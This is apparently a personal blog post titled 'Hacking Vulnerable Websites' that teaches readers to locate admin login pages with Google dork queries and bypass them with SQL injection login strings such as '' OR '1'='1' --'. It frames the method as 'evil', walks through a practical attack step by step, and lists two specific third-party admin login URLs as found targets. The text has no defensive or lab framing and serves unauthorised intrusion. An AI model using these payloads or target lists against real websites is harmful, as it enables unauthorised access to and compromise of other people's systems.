Hacking Vulnerable Websites

There were a lot of misconception regarding hacking of websites, that only skilled people or geek people can hack websites but it isn’t true. Anyone can hack websites with just two things:

#1 Proper Knowledge about hacking techniques:

Which you’ll get in this article. The below article will teach you hacking technique in the most sorted and easiest way.

#2 Evil Brain

You reached on this page, that proves 😉

So how to hack websites?

There are many ways to hack websites, it depends on us to choose which technique to hack. Here i’ll be using combo of two technique i.e.

# Google Dork

# Sql Injection

Our first goal is to find out the vulnerable websites, for that we need google dorks. Google dork is very simple technique all you have to do is; write a dork (dorks are nothing but some Formulas to find vulnerable websites) in google search box and find out sites which are vulnerable.

What sort of dorks?

So you would normally understand it like this:
“inurl” = input URL
“domain” = your desired domain ex. .gov
“dorks” = your dork of your choice

You can use following words instead of inurl :

intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
froogle:
info:
movie:
weather:
related:
link:

You can use the intitle to find anything in the title of the website. Which also could be useful to find downloads or anything else.

This is an example to download mp3 songs for free.

Now here, in  using dork we need to use our evil brain to find out that which query or formula will give result of vulnerable websites. An example of this is given in practical section below.

So once you got to know about google dork, lets go for SQL injection.

How to use SQL Injection?

This is the most simplest part, Once you found a vulnerable website you just have to fill username and password in their login page like this:

Username : ‘=’ ‘OR’
Password : ‘=’ ‘OR’

or some other sql Injections like:

‘ OR ‘1’=’1′ —
‘ OR ‘1’=’1′ ({
‘ OR ‘1’=’1′ /*

And that’s it!

Practically:

Step1: Using dork as

inurl:”/adminpanel/loginpage”

Result is something like this

dork.png

Step2: Opening the first link and in that login page injecting our sql command

Username : ‘=’ ‘OR’
Password : ‘=’ ‘OR’

sql.png

And here we go

hacked.png

Some of the sites which i found while dorking

Dork as : inurl:”adminpanel/login”

http://www.mindsparktechnologies.com/UAT/ASL/adminpanel/login.html

http://optimaindia.in/adminpanel/login.php

Similarly try different combination in dorking all you need is to think evil !

Advertisements

Author: Mahavir Rathod

Technical head at All web vision. Professional web designer, Web technology geek.

One thought on “Hacking Vulnerable Websites”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s